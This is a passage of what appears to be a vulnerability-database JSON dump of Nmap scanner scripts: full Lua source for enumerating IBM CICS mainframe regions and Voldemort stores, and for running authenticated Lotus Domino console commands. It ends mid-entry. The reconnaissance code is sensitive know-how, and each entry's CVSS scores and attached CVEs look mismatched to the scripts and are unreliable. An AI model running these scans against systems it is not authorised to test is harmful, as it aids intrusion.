Default is <code>CEMT</code>\n-- @args cics-info.trans Instead of gathering all transaction IDs supplying a name here\n-- will make the script only look up one transaction ID\n-- @args cics-info.user Username to use if access to CEMT requires authentication\n-- @args cics-info.pass Password to use if access to CEMT requires authentication\n--\n-- @usage\n-- nmap --script=cics-info -p 23 <targets>\n--\n-- nmap --script=cics-info --script-args cics-info.commands='logon applid(coolcics)',\n-- cics-info.user=test,cics-info.pass=test,cics-info.cemt='ZEMT',\n-- cics-info.trans=CICA -p 23 <targets>\n--\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 23/tcp open tn3270 IBM Telnet TN3270 (TN3270E)\n-- | cics-info:\n-- | Security: Disabled\n-- | System:\n-- | z/OS Version: 02.01.00\n-- | CICS Version: 05.02.00\n-- | System ID: CICS\n-- | Application ID: CICSFAKE\n-- | Default User: USERCICS\n-- | Datasets:\n-- | CICS.FILEA\n-- | HLQ123.CICS.DFHCSD\n-- | HLQ123.CICS.DFHLRQ\n-- | Libraries:\n-- | HLQ123.CICS.SDFHLOAD\n-- | Users:\n-- | USERCICS\n-- | Transaction / Program:\n-- | AADD / DFH$AALL\n-- | ABRW / DFH$ABRW\n-- | AINQ / DFH$AALL\n-- | AMNU / DFH$AMNU\n-- | AORD / DFH$AREN\n-- | AORQ / DFH$ACOM\n-- | AREP / DFH$AREP\n-- | AUPD / DFH$AALL\n-- | CADP / DFHDPLU\n-- ...\n-- | CEDX / DFHEDFP\n-- | CEGN / DFHCEGN\n-- | CEHP / DFHCHS\n-- | CEHS / DFHCHS\n-- | CEJR / DFHEJITL\n-- | CEMN / DFHCEMNA\n-- | CEMT / DFHEMTP\n-- | CEOT / DFHEOTP\n-- | CXRT / DFHCRT\n-- | DSNC / DFHD2CM1\n\n-- @changelog\n-- 2017-01-30 - v0.1 - created by Soldier of Fortran\n\nauthor = \"Philip Young aka Soldier of Fortran\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\nportrule = shortport.port_or_service({23,992}, \"tn3270\")\n\n\n\n--- Gathers CICS transaction server information\n--\n-- @param host host NSE object\n-- @param port port NSE object\n-- @param user CICS userID\n-- @param pass CICS userID password\n-- @param commands 
optional script-args of commands to use to get to CICS\n-- @param cemt transaction ID to use instead of CEMT\n-- @param trans transaction ID to check instead of gathering all\n-- @return Status boolean true if CICS was detected.\n-- @return Table of information or error message\n\nlocal function cics_info( host, port, commands, user, pass, cemt, trans )\n stdnse.debug(\"Checking for CICS\")\n local tn = tn3270.Telnet:new()\n local status, err = tn:initiate(host,port)\n local msg = 'Unable to get to CICS'\n local more = true\n local count = 1\n local results = stdnse.output_table()\n if not status then\n stdnse.debug(\"Could not initiate TN3270: %s\", err )\n return false, msg\n end\n tn:get_screen_debug(2) -- prints TN3270 screen to debug\n stdnse.debug(\"Getting to CICS\")\n local run = stringaux.strsplit(\";%s*\", commands)\n for i = 1, #run do\n stdnse.debug(1,\"Issuing Command (#%s of %s): %s\", i, #run ,run[i])\n tn:send_cursor(run[i])\n tn:get_all_data()\n tn:get_screen_debug(2)\n end\n tn:get_all_data()\n tn:get_screen_debug(2) -- for debug purposes\n -- we should technically be at CICS. So we send:\n -- * F3 to exit the CICS program\n -- * CLEAR (a tn3270 command) to clear the screen.\n -- (you need to clear before sending a transaction ID)\n -- * a known default CICS transaction ID with predictable outcome\n -- (CESF with 'Sign-off is complete.' as the result)\n -- to confirm that we were in CICS. If so we return true\n -- otherwise we return false\n local count = 1\n while not tn:isClear() and count < 6 do\n -- some systems will just kick you off others are slow in responding\n -- this loop continues to try getting out of CESL 6 times. 
If it can't\n -- then we probably weren't in CICS to begin with.\n if tn:find(\"Signon\") then\n stdnse.debug(2,\"Found CESL/CESN 'Signon' sending PF3\")\n tn:send_pf(3)\n tn:get_all_data()\n end\n tn:get_all_data()\n stdnse.debug(2,\"Clearing the Screen\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n count = count + 1\n end\n if count == 6 then\n return false, msg\n end\n stdnse.debug(2,\"Sending CESF (CICS Default Sign-off)\")\n tn:send_cursor('CESF')\n tn:get_all_data()\n if tn:isClear() then\n tn:get_all_data(1000)\n end\n tn:get_screen_debug(2)\n\n if not tn:find('off is complete.') then\n return false, 'Unable to get to CICS. Try --script-args cics-info.commands=\"logon applid(<applid>)\"'\n end\n\n\n if user and pass then -- We're doing authenticated CICS testing now baby!\n stdnse.verbose(2,'Logging in with %s / %s for auth testing', user, pass)\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n tn:send_cursor('CESN')\n tn:get_all_data()\n tn:get_screen_debug(2)\n local fields = tn:writeable() -- Get the writeable field areas\n local user_loc = {fields[1][1],user} -- This is the 'UserID:' field\n local pass_loc = {fields[3][1],pass} -- This is the 'Password:' field ([2] is a group ID)\n stdnse.verbose('Trying CICS: %s : %s', user, pass)\n tn:send_locations({user_loc,pass_loc})\n tn:get_all_data()\n stdnse.debug(2,\"Screen Received for User ID: %s / %s\", user, pass)\n tn:get_screen_debug(2)\n count = 1\n while not tn:find('DFHCE3549') and count < 6 do\n tn:get_all_data(1000) -- loop for 6 seconds\n tn:get_screen_debug(2)\n count = count + 1\n end\n if not tn:find('DFHCE3549') then\n msg = 'Unable to access CICS with User: '..user..' 
/ Pass: '..pass\n return false, msg\n end\n end\n -- By now it's time to start trying to gather information\n tn:send_clear()\n tn:get_all_data()\n tn:send_cursor('CESN')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n results[\"Security\"] = tn:find('DFHCE3547') and \"Enabled\" or \"Disabled\"\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE SYSTEM'\")\n tn:send_cursor('CEMT INQUIRE SYSTEM')\n tn:get_all_data()\n tn:get_screen_debug(2)\n if tn:find('DFHAC2002') then\n results[\"Error\"] = 'CEMT Access Denied.'\n return true, results\n elseif tn:find('NOT AUTHORIZED') then\n results[\"System\"] = \"CEMT 'INQUIRE SYSTEM' Access Denied.\"\n else\n local sysresults = stdnse.output_table()\n local l1, l2 = tn:find('Oslevel')\n local oslevel = tn:get_screen_raw():sub(l2+2,l2+7)\n l1, l2 = tn:find('Cicstslevel')\n local cicstslevel = tn:get_screen_raw():sub(l2+2,l2+7)\n l1, l2 = tn:find('Dfltuser')\n local Dfltuser = tn:get_screen_raw():sub(l2+2,l2+10)\n local Dfltuser_len = Dfltuser:find(')')\n l1, l2 = tn:find('Db2conn')\n local Db2conn = tn:get_screen_raw():sub(l2+2,l2+10)\n local Db2conn_len = Db2conn:find(')')\n l1, l2 = tn:find('Mqconn')\n local Mqconn = tn:get_screen_raw():sub(l2+2,l2+10)\n local Mqconn_len = Mqconn:find(')')\n l1, l2 = tn:find('SYSID')\n local SYSID = tn:get_screen_raw():sub(l2+2,l2+10)\n local SYSID_len = SYSID:find('\\00')\n l1, l2 = tn:find('APPLID')\n local APPLID = tn:get_screen_raw():sub(l2+2,l2+10)\n local APPLID_len = APPLID:find('\\00')\n sysresults[\"z/OS Version\"] = (\"%s.%s.%s\"):format( oslevel:sub(1,2),oslevel:sub(3,4),oslevel:sub(5,6) )\n sysresults[\"CICS Version\"] = (\"%s.%s.%s\"):format( cicstslevel:sub(1,2),cicstslevel:sub(3,4),cicstslevel:sub(5,6) )\n sysresults[\"System ID\"] = SYSID:sub(1,SYSID_len-1)\n sysresults[\"Application 
ID\"] = APPLID:sub(1,APPLID_len-1)\n sysresults[\"Default User\"] = Dfltuser:sub(1,Dfltuser_len-1)\n if Db2conn_len > 1 then\n sysresults[\"DB2 Connection\"] = Db2conn:sub(1,Db2conn_len-1)\n end\n if Mqconn_len > 1 then\n sysresults[\"MQ Connection\"] = Mqconn:sub(1,Mqconn_len-1)\n end\n results[\"System\"] = sysresults\n end -- Done with INQUIRE SYSTEM\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE DSNAME'\")\n tn:send_cursor('CEMT INQUIRE DSNAME')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Datasets\"] = \"CEMT 'INQUIRE DSNAME' Access Denied.\"\n else\n local datasets = {}\n while more do\n more = false\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Dsn') then\n table.insert(datasets,line:sub(line:find('%(')+1, line:find(')')-1):match( \"(.-)%s*$\" ))\n if count >= 9 and line:find('+') then\n more = true\n count = 1\n stdnse.debug(2,\"Sending F11\")\n tn:send_pf(11)\n tn:get_all_data()\n tn:get_screen_debug(2)\n else\n count = count + 1\n end\n end\n end\n end\n results[\"Datasets\"] = datasets\n end -- Done with DSNAME\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE LIBRARY'\")\n tn:send_cursor('CEMT INQUIRE LIBRARY')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Libraries\"] = \"CEMT 'INQUIRE LIBRARY' Access Denied.\"\n else\n local libraries = {}\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Dsname') then\n table.insert(libraries,line:sub(line:find('%(')+1, line:find(')')-1):match( \"(.-)%s*$\" ))\n end\n end\n 
results[\"Libraries\"] = libraries\n end -- Done with Library\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE TASK'\")\n tn:send_cursor('CEMT INQUIRE TASK')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Users\"] = \"CEMT 'INQUIRE TASK' Access Denied.\"\n else\n count = 1\n more = true\n local users = {}\n while more do\n more = false\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Use') then\n table.insert(users,line:sub(line:find('Use')+4, line:find(')',line:find('Use'))-1):match( \"(.-)%s*$\" ))\n if count >= 9 and line:find('+') then\n more = true\n count = 1\n stdnse.debug(2,\"Sending F11\")\n tn:send_pf(11)\n tn:get_all_data()\n tn:get_screen_debug(2)\n else\n count = count + 1\n end\n end\n end\n end\n results[\"Users\"] = users\n end -- End of TASK\n\n stdnse.debug(2,\"Sending F3\")\n tn:send_pf(3)\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.debug(2,\"Sending 'Clear Screen'\")\n tn:send_clear()\n tn:get_all_data()\n tn:get_screen_debug(2)\n stdnse.verbose(2,\"Sending 'CEMT INQUIRE TRANSACTION(\".. trans ..\") en'\")\n tn:send_cursor('CEMT INQUIRE TRANSACTION('.. trans ..') en')\n tn:get_all_data()\n tn:get_screen_debug(2)\n\n if tn:find('NOT AUTHORIZED') then\n results[\"Transaction / Program\"] = \"CEMT 'INQUIRE TRANSACION' Access Denied.\"\n else\n local transactions = {}\n count = 1\n more = true\n local tra, pro = ''\n while more do\n more = false\n for line in tn:get_screen():gmatch(\"[^\\r\\n]+\") do\n if line:find('Tra%(') then\n tra = line:sub(line:find('%(')+1,line:find(')')-1)\n pro = line:sub(line:find('Pro%(')+4,line:find(')',line:find('Pro%('))-1)\n table.insert(transactions,tra..' 
/ '..pro)\n if count >= 9 and line:find('+') then\n more = true\n count = 1\n stdnse.debug(2,\"Sending F11\")\n tn:send_pf(11)\n tn:get_all_data()\n tn:get_screen_debug(2)\n else\n count = count + 1\n end\n end\n end\n end\n results[\"Transaction / Program\"] = transactions\n end -- Done with Transaction IDs\n tn:disconnect()\n return true, results\nend\n\n\naction = function(host, port)\n local commands = stdnse.get_script_args(SCRIPT_NAME .. '.commands') or 'cics'-- VTAM commands/macros to get to CICS\n local username = stdnse.get_script_args(SCRIPT_NAME .. '.user') or nil\n local password = stdnse.get_script_args(SCRIPT_NAME .. '.pass') or nil\n if (username or password) and not (username and password) then\n stdnse.verbose1(\"Both 'user' and 'pass' are required for CICS auth\")\n end\n local CEMT = stdnse.get_script_args(SCRIPT_NAME .. '.cemt') or 'cemt' -- to supply a different transaction ID if they've changed it\n local transaction = stdnse.get_script_args(SCRIPT_NAME .. '.trans') or '*'\n local status, results = cics_info(host, port, commands, username, password, CEMT, transaction)\n -- Report results. 
Only report an error if\n -- script args were set or the service is definitely TN3270\n if status or username or password or port.service == \"tn3270\" then\n return results\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:40", "description": "Retrieves cluster and store information from the Voldemort distributed key-value store using the Voldemort Native Protocol.\n\n## Example Usage \n \n \n nmap -p 6666 --script voldemort-info <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 6666/tcp open irc\n | voldemort-info:\n | Cluster\n | Name: mycluster\n | Id: 0\n | Host: localhost\n | HTTP Port: 8081\n | TCP Port: 6666\n | Admin Port: 6667\n | Partitions: 0, 1\n | Stores\n | test\n | Persistence: bdb\n | Description: Test store\n | Owners: harry@hogwarts.edu, hermoine@hogwarts.edu\n | Routing strategy: consistent-routing\n | Routing: client\n | wordcounts\n | Persistence: read-only\n | Routing strategy: consistent-routing\n |_ Routing: client\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-31T20:32:37", "type": "nmap", "title": "voldemort-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:VOLDEMORT-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/voldemort-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves cluster and store information from the Voldemort distributed key-value store using the Voldemort Native Protocol.\n]]\n\n---\n-- @usage\n-- nmap -p 6666 --script voldemort-info <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 6666/tcp open irc\n-- | voldemort-info:\n-- | Cluster\n-- | Name: mycluster\n-- | Id: 0\n-- | Host: localhost\n-- | HTTP Port: 8081\n-- | TCP Port: 6666\n-- | Admin Port: 6667\n-- | Partitions: 0, 1\n-- | Stores\n-- | test\n-- | Persistence: bdb\n-- | Description: Test store\n-- | Owners: harry@hogwarts.edu, hermoine@hogwarts.edu\n-- | Routing strategy: consistent-routing\n-- | Routing: client\n-- | wordcounts\n-- | Persistence: read-only\n-- | Routing strategy: consistent-routing\n-- |_ Routing: client\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(6666, \"vp3\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n-- Connect to the server and make sure it supports the vp3 protocol\n-- @param host table as received by the action method\n-- @param port table as received by the action method\n-- @return status true on success, false on failure\n-- @return socket connected to the server\nlocal function connect(host, port)\n local socket = nmap.new_socket()\n 
socket:set_timeout(5000)\n\n local status, err = socket:connect(host, port)\n if ( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n\n status, err = socket:send(\"vp3\")\n if ( not(status) ) then\n return false, \"Failed to send request to server\"\n end\n\n local response\n status, response = socket:receive_bytes(2)\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n elseif( response ~= \"ok\" ) then\n return false, \"Unsupported protocol\"\n end\n return true, socket\nend\n\n-- Get Voldemort metadata\n-- @param socket connected to the server\n-- @param file the xml file to retrieve\n-- @return status true on success false on failure\n-- @return data string as received from the server\nlocal function getMetadata(socket, file)\n\n local req = \"\\x01\\x00\" .. string.pack(\">s1x I4 s1x\", \"metadata\", 0, file)\n local status, err = socket:send(req)\n if ( not(status) ) then\n return false, \"Failed to send request to server\"\n end\n local status, data = socket:receive_bytes(10)\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n end\n local len = string.unpack(\">I2\", data, 9)\n while( #data < len - 2 ) do\n local status, tmp = socket:receive_bytes(len - 2 - #data)\n if ( not(status) ) then\n return false, \"Failed to receive response from server\"\n end\n data = data .. 
tmp\n end\n return true, data\nend\n\n\naction = function(host, port)\n\n -- table of variables to query the server\n local vars = {\n [\"cluster\"] = {\n { key = \"Name\", match = \"<cluster>.-<name>(.-)</name>\" },\n { key = \"Id\", match = \"<cluster>.-<server>.-<id>(%d-)</id>.-</server>\" },\n { key = \"Host\", match = \"<cluster>.-<server>.-<host>(%w-)</host>.-</server>\" },\n { key = \"HTTP Port\", match = \"<cluster>.-<server>.-<http%-port>(%d-)</http%-port>.-</server>\" },\n { key = \"TCP Port\", match = \"<cluster>.-<server>.-<socket%-port>(%d-)</socket%-port>.-</server>\" },\n { key = \"Admin Port\", match = \"<cluster>.-<server>.-<admin%-port>(%d-)</admin%-port>.-</server>\" },\n { key = \"Partitions\", match = \"<cluster>.-<server>.-<partitions>([%d%s,]*)</partitions>.-</server>\" },\n },\n [\"store\"] = {\n { key = \"Persistence\", match = \"<store>.-<persistence>(.-)</persistence>\" },\n { key = \"Description\", match = \"<store>.-<description>(.-)</description>\" },\n { key = \"Owners\", match = \"<store>.-<owners>(.-)</owners>\" },\n { key = \"Routing strategy\", match = \"<store>.-<routing%-strategy>(.-)</routing%-strategy>\" },\n { key = \"Routing\", match = \"<store>.-<routing>(.-)</routing>\" },\n },\n }\n\n -- connect to the server\n local status, socket = connect(host, port)\n if ( not(status) ) then\n return fail(socket)\n end\n\n -- get the cluster meta data\n local status, response = getMetadata(socket, \"cluster.xml\")\n if ( not(status) or not(response:match(\"<cluster>.*</cluster>\")) ) then\n return\n end\n\n -- Get the cluster details\n local cluster_tbl = { name = \"Cluster\" }\n for _, item in ipairs(vars[\"cluster\"]) do\n local val = response:match(item.match)\n if ( val ) then\n table.insert(cluster_tbl, (\"%s: %s\"):format(item.key, val))\n end\n end\n\n -- get the stores meta data\n local status, response = getMetadata(socket, \"stores.xml\")\n if ( not(status) or not(response:match(\"<stores>.-</stores>\")) ) then\n return\n 
end\n\n local result, stores = {}, { name = \"Stores\" }\n table.insert(result, cluster_tbl)\n\n -- iterate over store items\n for store in response:gmatch(\"<store>.-</store>\") do\n local name = store:match(\"<store>.-<name>(.-)</name>\")\n local store_tbl = { name = name or \"unknown\" }\n\n for _, item in ipairs(vars[\"store\"]) do\n local val = store:match(item.match)\n if ( val ) then\n table.insert(store_tbl, (\"%s: %s\"):format(item.key, val))\n end\n end\n table.insert(stores, store_tbl)\n end\n table.insert(result, stores)\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:39", "description": "Runs a console command on the Lotus Domino Console using the given authentication credentials (see also: domcon-brute)\n\n## Script Arguments \n\n#### domcon-cmd.cmd \n\nThe command to run on the remote server\n\n#### domcon-cmd.pass \n\nThe password used to authenticate to the server\n\n#### domcon-cmd.user \n\nThe user used to authenticate to the server\n\n## Example Usage \n \n \n nmap -p 2050 <host> --script domcon-cmd --script-args domcon-cmd.cmd=\"show server\", \\\n domcon-cmd.user=\"Patrik Karlsson\",domcon-cmd.pass=\"secret\"\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 2050/tcp open unknown syn-ack\n | domcon-cmd:\n | show server\n |\n | Lotus Domino (r) Server (Release 8.5 for Windows/32) 2010-07-30 00:52:58\n |\n | Server name: server1/cqure - cqure testing server\n | Domain name: cqure\n | Server directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\n | Partition: C.Program Files.IBM.Lotus.Domino.data\n | Elapsed time: 00:27:11\n | Transactions/minute: Last minute: 0; Last hour: 0; Peak: 0\n | Peak # of sessions: 0 at\n | Transactions: 0 Max. 
concurrent: 20\n | ThreadPool Threads: 20 (TCPIP Port)\n | Availability Index: 100 (state: AVAILABLE)\n | Mail Tracking: Not Enabled\n | Mail Journalling: Not Enabled\n | Number of Mailboxes: 1\n | Pending mail: 0 Dead mail: 0\n | Waiting Tasks: 0\n | DAOS: Not Enabled\n | Transactional Logging: Not Enabled\n | Fault Recovery: Not Enabled\n | Activity Logging: Not Enabled\n | Server Controller: Enabled\n | Diagnostic Directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\n | Console Logging: Enabled (1K)\n | Console Log File: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\\console.log\n |_ DB2 Server: Not Enabled\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-19T23:02:58", "type": "nmap", "title": "domcon-cmd NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:DOMCON-CMD.NSE", "href": 
"https://nmap.org/nsedoc/scripts/domcon-cmd.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nRuns a console command on the Lotus Domino Console using the given authentication credentials (see also: domcon-brute)\n]]\n\n---\n-- @usage\n-- nmap -p 2050 <host> --script domcon-cmd --script-args domcon-cmd.cmd=\"show server\", \\\n-- domcon-cmd.user=\"Patrik Karlsson\",domcon-cmd.pass=\"secret\"\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 2050/tcp open unknown syn-ack\n-- | domcon-cmd:\n-- | show server\n-- |\n-- | Lotus Domino (r) Server (Release 8.5 for Windows/32) 2010-07-30 00:52:58\n-- |\n-- | Server name: server1/cqure - cqure testing server\n-- | Domain name: cqure\n-- | Server directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\n-- | Partition: C.Program Files.IBM.Lotus.Domino.data\n-- | Elapsed time: 00:27:11\n-- | Transactions/minute: Last minute: 0; Last hour: 0; Peak: 0\n-- | Peak # of sessions: 0 at\n-- | Transactions: 0 Max. 
concurrent: 20\n-- | ThreadPool Threads: 20 (TCPIP Port)\n-- | Availability Index: 100 (state: AVAILABLE)\n-- | Mail Tracking: Not Enabled\n-- | Mail Journalling: Not Enabled\n-- | Number of Mailboxes: 1\n-- | Pending mail: 0 Dead mail: 0\n-- | Waiting Tasks: 0\n-- | DAOS: Not Enabled\n-- | Transactional Logging: Not Enabled\n-- | Fault Recovery: Not Enabled\n-- | Activity Logging: Not Enabled\n-- | Server Controller: Enabled\n-- | Diagnostic Directory: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\n-- | Console Logging: Enabled (1K)\n-- | Console Log File: C:\\Program Files\\IBM\\Lotus\\Domino\\data\\IBM_TECHNICAL_SUPPORT\\console.log\n-- |_ DB2 Server: Not Enabled\n--\n-- @args domcon-cmd.cmd The command to run on the remote server\n-- @args domcon-cmd.user The user used to authenticate to the server\n-- @args domcon-cmd.pass The password used to authenticate to the server\n--\n\n--\n-- Version 0.1\n-- Created 07/30/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"auth\"}\n\n\nportrule = shortport.port_or_service(2050, \"dominoconsole\", \"tcp\", \"open\")\n\n--- Reads an API block from the server\n--\n-- @param socket already connected to the server\n-- @return status true on success, false on failure\n-- @return result table containing lines with server response\n-- or error message if status is false\nlocal function readAPIBlock( socket )\n\n local lines\n local result = {}\n local status, line = socket:receive_lines(1)\n\n if ( not(status) ) then return false, \"Failed to read line\" end\n lines = stringaux.strsplit( \"\\n\", line )\n\n for _, line in ipairs( lines ) do\n if ( not(line:match(\"BeginData\")) and not(line:match(\"EndData\")) ) then\n table.insert(result, line)\n end\n end\n\n -- Clear trailing empty lines\n while( true ) do\n if ( result[#result] == \"\" ) then\n 
table.remove(result, #result)\n else\n break\n end\n end\n\n return true, result\n\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local socket = nmap.new_socket()\n local result_part, result, cmds = {}, {}, {}\n local user = stdnse.get_script_args('domcon-cmd.user')\n local pass = stdnse.get_script_args('domcon-cmd.pass')\n local cmd = stdnse.get_script_args('domcon-cmd.cmd')\n\n if( not(cmd) ) then return fail(\"No command supplied (see domcon-cmd.cmd)\") end\n if( not(user)) then return fail(\"No username supplied (see domcon-cmd.user)\") end\n if( not(pass)) then return fail(\"No password supplied (see domcon-cmd.pass)\") end\n\n cmds = stringaux.strsplit(\";%s*\", cmd)\n\n socket:set_timeout(10000)\n local status = socket:connect( host, port )\n if ( status ) then\n socket:reconnect_ssl()\n end\n\n socket:send(\"#API\\n\")\n socket:send( (\"#UI %s,%s\\n\"):format(user,pass) )\n socket:receive_lines(1)\n socket:send(\"#EXIT\\n\")\n\n for i=1, #cmds do\n socket:send(cmds[i] .. \"\\n\")\n status, result_part = readAPIBlock( socket )\n if( status ) then\n result_part.name = cmds[i]\n table.insert( result, result_part )\n else\n return fail(result_part)\n end\n end\n\n socket:close()\n\n return stdnse.format_output( true, result )\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:31:50", "description": "Queries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers, and configuration settings. \n\nSQL Server credentials required: Yes (use `ms-sql-brute`, `ms-sql-empty-password` and/or `mssql.username` & `mssql.password`) Run criteria: \n\n * Host script: Will run if the `mssql.instance-all`, `mssql.instance-name`\nor `mssql.instance-port` script arguments are used (see mssql.lua). 
\n\n * Port script: Will run against any services identified as SQL Servers, but only \nif the `mssql.instance-all`, `mssql.instance-name` and `mssql.instance-port` script arguments are NOT used. \n\nNOTE: Communication with instances via named pipes depends on the `smb` library. To communicate with (and possibly to discover) instances via named pipes, the host must have at least one SMB port (e.g. TCP 445) that was scanned and found to be open. Additionally, named pipe connections may require Windows authentication to connect to the Windows host (via SMB) in addition to the authentication required to connect to the SQL Server instance itself. See the documentation and arguments for the `smb` library for more information. \n\nNOTE: By default, the ms-sql-* scripts may attempt to connect to and communicate with ports that were not included in the port list for the Nmap scan. This can be disabled using the `mssql.scanned-ports-only` script argument.\n\n## Script Arguments \n\n#### ms-sql-config.showall \n\nIf set, shows all configuration options.\n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the [mssql](<../lib/mssql.html#script-args>) library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the 